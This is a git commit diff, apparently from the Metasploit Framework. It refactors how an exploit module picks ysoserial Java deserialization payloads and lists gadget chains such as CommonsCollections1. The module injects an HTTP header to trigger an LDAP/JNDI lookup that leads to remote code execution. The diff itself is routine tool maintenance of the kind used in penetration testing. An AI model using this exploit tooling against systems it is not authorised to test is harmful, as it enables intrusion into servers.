Use an enum for the YSoSerial payload option
This commit is contained in:
parent
3cb70c01bf
commit
f56f328c8d
|
@ -10,19 +10,7 @@ class JavaDeserialization
|
|||
PAYLOAD_FILENAME = "ysoserial_payloads.json"
|
||||
|
||||
def self.ysoserial_payload(payload_name, command=nil, modified_type: 'none')
|
||||
# Open the JSON file and parse it
|
||||
path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
|
||||
begin
|
||||
json = JSON.parse(File.read(path))
|
||||
rescue Errno::ENOENT, JSON::ParserError
|
||||
raise RuntimeError, "Unable to load JSON data from: #{path}"
|
||||
end
|
||||
|
||||
# Extract the specified payload type (including cmd, bash, powershell, none)
|
||||
payloads_json = json[modified_type.to_s]
|
||||
if payloads_json.nil?
|
||||
raise ArgumentError, "#{modified_type} type not found in ysoserial payloads"
|
||||
end
|
||||
payloads_json = load_ysoserial_data(modified_type)
|
||||
|
||||
# Extract the specified payload (status, lengthOffset, bufferOffset, bytes)
|
||||
payload = payloads_json[payload_name]
|
||||
|
@ -67,6 +55,33 @@ class JavaDeserialization
|
|||
end
|
||||
end
|
||||
|
||||
def self.ysoserial_payload_names(modified_type: 'none')
|
||||
payloads_json = load_ysoserial_data(modified_type)
|
||||
payloads_json.keys
|
||||
end
|
||||
|
||||
class << self
|
||||
private
|
||||
|
||||
def load_ysoserial_data(modified_type)
|
||||
# Open the JSON file and parse it
|
||||
path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
|
||||
begin
|
||||
json = JSON.parse(File.read(path))
|
||||
rescue Errno::ENOENT, JSON::ParserError
|
||||
raise RuntimeError, "Unable to load JSON data from: #{path}"
|
||||
end
|
||||
|
||||
# Extract the specified payload type (including cmd, bash, powershell, none)
|
||||
payloads_json = json[modified_type.to_s]
|
||||
if payloads_json.nil?
|
||||
raise ArgumentError, "#{modified_type} type not found in ysoserial payloads"
|
||||
end
|
||||
|
||||
payloads_json
|
||||
end
|
||||
end
|
||||
|
||||
end # JavaDeserialization
|
||||
end # Util
|
||||
end # Msf
|
||||
|
|
|
@ -75,9 +75,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
|
||||
OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
|
||||
OptString.new('HTTP_HEADER', [ true, 'The header to inject', 'X-Api-Version']),
|
||||
OptEnum.new('YSOSERIAL_LIB', [
|
||||
true, 'Ysoserial library for deserialization', '',
|
||||
%w[CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 Groovy1 Hibernate1 JBossInterceptors1 JSON1 JavassistWeld1 Jdk7u21 MozillaRhino1 Myfaces1 ROME Spring1 Spring2]
|
||||
OptEnum.new('YSOSERIAL_PAYLOAD', [
|
||||
true, 'Ysoserial payload to use for deserialization', '',
|
||||
Msf::Util::JavaDeserialization.ysoserial_payload_names
|
||||
]),
|
||||
OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080]),
|
||||
OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true]),
|
||||
|
@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'javaCodebase'.to_ber, [ resource_url_string.to_ber ].to_ber_set ].to_ber_sequence,
|
||||
]
|
||||
else
|
||||
java_payload = generate_java_deserialization_for_payload(datastore['YSOSERIAL_LIB'], payload)
|
||||
java_payload = generate_java_deserialization_for_payload(datastore['YSOSERIAL_PAYLOAD'], payload)
|
||||
# vprint_good("Serialized java payload: #{java_payload}")
|
||||
attrs = [
|
||||
[ 'javaClassName'.to_ber, [ 'foo'.to_ber ].to_ber_set ].to_ber_sequence,
|
||||
|
|
Loading…
Reference in New Issue